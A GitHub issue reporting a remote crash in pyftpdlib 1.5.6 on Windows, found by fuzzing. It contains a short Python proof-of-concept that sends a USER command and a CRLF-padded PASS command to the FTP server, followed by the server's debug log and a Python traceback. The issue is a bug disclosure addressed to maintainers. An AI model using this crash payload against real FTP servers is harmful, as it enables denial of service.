pyftpdlib icon indicating copy to clipboard operation
pyftpdlib copied to clipboard

Published 20 hours ago verified publisher icon giampaolo

pyftpdlib 1.5.6 remote crash bug on windows

Open dazhouzhou opened this issue 2 years ago • 1 comments

I used LaiFu to fuzz pyftpdlib on windows 10 and I found a remote crash bug. Detailed details are as follows:

  • run pyftpdlib
python -m pyftpdlib -u fuzzer -P passwd --debug
  • run poc.py
import socket

host = "127.0.0.1"
port = 2121

pkt1 = bytes.fromhex("555345522066757a7a65720d0a")
pkt2 = bytes.fromhex("50415353200d0a0d0a0d0a0d0a0d0a0d0a0d0a0d0a0d0a0d0a0d0a0d0a0d0a0d0a0d0a0d0a0d0a")

if __name__ == "__main__":
    # python -m pyftpdlib -u fuzzer -P passwd --debug
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((host, port))
    sock.recv(1024)
    sock.send(pkt1)
    sock.recv(10000)
    sock.send(pkt2)
    sock.recv(10000)
    sock.close()
  • crash log
[I 2022-04-12 09:48:49] concurrency model: async
[I 2022-04-12 09:48:49] masquerade (NAT) address: None
[I 2022-04-12 09:48:49] passive ports: None
[D 2022-04-12 09:48:49] poller: 'pyftpdlib.ioloop.Select'
[D 2022-04-12 09:48:49] authorizer: 'pyftpdlib.authorizers.DummyAuthorizer'
[D 2022-04-12 09:48:49] handler: 'pyftpdlib.handlers.type'
[D 2022-04-12 09:48:49] max connections: 512
[D 2022-04-12 09:48:49] max connections per ip: unlimited
[D 2022-04-12 09:48:49] timeout: 300
[D 2022-04-12 09:48:49] banner: 'pyftpdlib 1.5.6 ready.'
[D 2022-04-12 09:48:49] max login attempts: 3
[I 2022-04-12 09:48:49] >>> starting FTP server on 0.0.0.0:2121, pid=11208 <<<
[I 2022-04-12 09:48:51] 127.0.0.1:63793-[] FTP session opened (connect)
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 220 pyftpdlib 1.5.6 ready.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <- USER fuzzer
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 331 Username ok, send password.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[fuzzer] <- PASS ******
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] [debug] call: send(), err: [WinError 10053] 你的主机中的软件中止了一个已建立的连接。 (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] [debug] call: close() (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] [debug] call: unregister(); fd was no longer in socket_map (<pyftpdlib.ioloop.Select (fds=1, tasks=2) at 0x27d52002110>)
[I 2022-04-12 09:48:51] 127.0.0.1:63793-[] FTP session closed (disconnect).
[D 2022-04-12 09:48:51] [debug] call: initiate_send(); called with no connection (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] [debug] call: initiate_send(); called with no connection (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] [debug] call: initiate_send(); called with no connection (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] [debug] call: initiate_send(); called with no connection (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] [debug] call: initiate_send(); called with no connection (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] [debug] call: initiate_send(); called with no connection (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] [debug] call: initiate_send(); called with no connection (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] [debug] call: initiate_send(); called with no connection (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] [debug] call: initiate_send(); called with no connection (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] [debug] call: initiate_send(); called with no connection (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] [debug] call: initiate_send(); called with no connection (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] [debug] call: initiate_send(); called with no connection (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] [debug] call: initiate_send(); called with no connection (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] [debug] call: initiate_send(); called with no connection (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:55] [debug] closing IOLoop (<pyftpdlib.ioloop.Select (fds=2, tasks=1) at 0x27d52002110>)
[D 2022-04-12 09:48:55] [debug] call: close() (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
Traceback (most recent call last):
  File "C:\Users\xzz\AppData\Local\Programs\Python\Python310\lib\runpy.py", line 196, in _run_module_as_main
    return _run_code(code, main_globals, None,
  File "C:\Users\xzz\AppData\Local\Programs\Python\Python310\lib\runpy.py", line 86, in _run_code
    exec(code, run_globals)
  File "C:\Users\xzz\AppData\Local\Programs\Python\Python310\lib\site-packages\pyftpdlib\__main__.py", line 122, in <module>
    main()
  File "C:\Users\xzz\AppData\Local\Programs\Python\Python310\lib\site-packages\pyftpdlib\__main__.py", line 116, in main
    ftpd.serve_forever(timeout=2 if os.name == 'nt' else None)
  File "C:\Users\xzz\AppData\Local\Programs\Python\Python310\lib\site-packages\pyftpdlib\servers.py", line 245, in serve_forever
    self.ioloop.loop(timeout, blocking)
  File "C:\Users\xzz\AppData\Local\Programs\Python\Python310\lib\site-packages\pyftpdlib\ioloop.py", line 343, in loop
    poll(timeout)
  File "C:\Users\xzz\AppData\Local\Programs\Python\Python310\lib\site-packages\pyftpdlib\ioloop.py", line 446, in poll
    r, w, e = select.select(self._r, self._w, [], timeout)
OSError: [WinError 10038] 在一个非套接字上尝试了一个操作。

dazhouzhou avatar Apr 12 '22 02:04 dazhouzhou